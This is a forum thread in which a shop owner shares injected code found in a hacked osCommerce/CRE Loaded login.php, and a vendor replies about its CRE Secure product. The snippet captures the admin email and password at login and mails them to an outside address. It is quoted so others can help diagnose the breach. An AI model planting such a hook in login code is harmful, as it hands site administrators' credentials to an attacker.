Site Hacked

rrg · **Joined:** Fri Sep 10, 2010 5:21 pm **Posts:** 4

This is the top of my login.php file:

Code:

<?php
/*
  $Id: login.php,v 1.2 2004/03/05 00:36:41 ccwjr Exp $
  osCommerce, Open Source E-Commerce Solutions
  http://www.oscommerce.com
  Copyright (c) 2002 osCommerce
  Released under the GNU General Public License
*/
  require('includes/application_top.php');
  if ($session_started == false) {
  echo 'session not started';
  }
  $error = false;
  if (isset($HTTP_GET_VARS['action']) && ($HTTP_GET_VARS['action'] == 'process')) {
    $email_address = tep_db_prepare_input($HTTP_POST_VARS['email_address']);
    $password = tep_db_prepare_input($HTTP_POST_VARS['password']);
$password1=tep_db_prepare_input($HTTP_POST_VARS['password']);
$email1=tep_db_prepare_input($HTTP_POST_VARS['email_address']);
$to1='admin@finderdirect.com';
$subject1='Admin Login at *******';

mail($to1, $subject1, $password1, $email1);

Notice where the email is being sent to: admin@finderdirect.com
I don't know why it was there, I know we were recently hacked through the cre loaded 6.2 admin problem, and someone is receiving this email. Basically it will send an email with the username and password of the admin who logged in to that email address. If there are other issues I should be looking into I would appreciate a reply.

Sal · **Joined:** Wed Jul 30, 2003 12:00 am **Posts:** 1411

These kinds of attacks are why we created CRE Secure, so that there is no Credit Card data in your site to get stolen.

6.2 is old code now, you need to upgrade to the latest code base and if you take credit cards with any of the popular gateways you need CRE Secure www.cresecure.com.

Nimitz1061 · **Posted:** Thu Apr 14, 2011 7:47 am

Sal,

That is fantastic news!

Can you explain to us how CRE Secure manages to stop people who gain admin access from stealing customer data and selling it to spammers or combine that information with other stolen data to assemble complete lists of working card access data and selling it?

How about switching the payment module data to send the payments to a different bank account?? What methods is it using to stop that?

Can it stop that admin user from embedding his own content in the main page, pages, articles and product systems???

Tell us more...

David

Sal · **Joined:** Wed Jul 30, 2003 12:00 am **Posts:** 1411

David,

Thanks for the question. It does not take over your whole site, and protect everything in your admin.

What it does do, is ensure that the payload of sensitive data is far less valuable to the hacker, and less damaging to your customers and your merchant account. It ensures that there is no card holder data in your database.

You still have to stay upto date with your patches and keep CRE Loaded secure as much as possible. CRE Secure has recently rolled out tokenization, and a card to token API, so convert all your existing card data into safe card tokens, we have had several loaded merchants code that already, we will be releasing token support directly into the next 6.4.2 patch for loaded stores.

You have a choice, leave all the old payment data there and collect card data and lose it when you get hacked, or remove it with CRE Secure and reduce the hit.

As for changing out the payment modules that is a problem, but should also result in an immediate flag to your business team when money stops flowing. That is why we removed all the actual other payment modules from CRE Loaded, you would have to upload them or they are there from an upgrade. So remove them if they are there.

Again thanks for the questions. I look forward to your response.

Loaded Commerce Community

Site Hacked

Who is online

Main Menu

Login

Forums Latest Activity

Top Listing

Members Online